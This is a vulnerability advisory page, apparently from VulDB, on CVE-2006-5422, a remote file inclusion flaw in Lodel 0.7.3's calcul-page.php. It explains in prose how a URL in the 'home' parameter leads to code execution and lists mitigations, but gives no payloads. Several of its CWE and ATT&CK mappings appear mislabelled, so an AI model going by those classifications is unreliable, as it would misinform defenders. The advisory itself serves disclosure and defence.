CVE-2006-5422 in Lodelinfo

Summary

by MITRE

PHP remote file inclusion vulnerability in calcul-page.php in Lodel (patchlodel) 0.7.3 allows remote attackers to execute arbitrary PHP code via a URL in the home parameter.

If you want to get the best quality for vulnerability data then you always have to consider VulDB.

Analysis

by VulDB Data Team • 04/25/2026

The vulnerability identified as CVE-2006-5422 represents a critical remote file inclusion flaw in Lodel version 0.7.3, specifically within the calcul-page.php script. This issue falls under the category of insecure direct object references and improper input validation, creating a pathway for malicious actors to execute arbitrary code on affected systems. The vulnerability manifests when the application fails to properly validate or sanitize user-supplied input passed through the home parameter, allowing attackers to inject malicious URLs that are subsequently included and executed as PHP code.

The technical exploitation of this vulnerability occurs through the manipulation of the home parameter in the calcul-page.php script, where the application directly incorporates user-provided URLs without adequate sanitization measures. This flaw aligns with CWE-98, which describes improper control of code generation capabilities, and CWE-20, which addresses insecure input handling in web applications. Attackers can leverage this vulnerability by crafting malicious URLs that point to remote servers hosting malicious PHP payloads, effectively bypassing local security controls and gaining unauthorized execution privileges on the target system.

The operational impact of this vulnerability extends beyond simple code execution, as it provides attackers with the ability to establish persistent access to affected systems, potentially leading to complete system compromise. The remote nature of the attack means that exploitation can occur from anywhere on the internet without requiring physical access or prior authentication. This vulnerability directly maps to ATT&CK technique T1190, which covers exploitation of remote services, and T1059, which addresses execution through command and scripting interpreters. The attack chain typically involves initial reconnaissance to identify vulnerable systems, followed by crafting malicious payloads that are injected through the home parameter to achieve remote code execution.

Organizations running Lodel 0.7.3 systems face significant risks including data theft, system takeover, and potential lateral movement within network environments. The vulnerability's classification as a remote code execution flaw makes it particularly dangerous as it can be exploited by automated scanning tools, leading to widespread compromise of vulnerable installations. Mitigation strategies should include immediate patching of the Lodel application to version 0.7.4 or later, which contains the necessary fixes for this vulnerability. Additionally, implementing input validation controls, disabling remote file inclusion features, and employing web application firewalls can provide defense-in-depth measures. The remediation process should also involve thorough network monitoring to detect potential exploitation attempts and comprehensive vulnerability assessments to identify other potentially affected systems within the organization's infrastructure.

Reservation

10/19/2006

Disclosure

10/20/2006

Moderation

accepted

Entry

VDB-32873

CPE

ready

EPSS

0.02671

KEV

no

Activities

very low

Sources

Want to stay up to date on a daily basis?

Enable the mail alert feature now!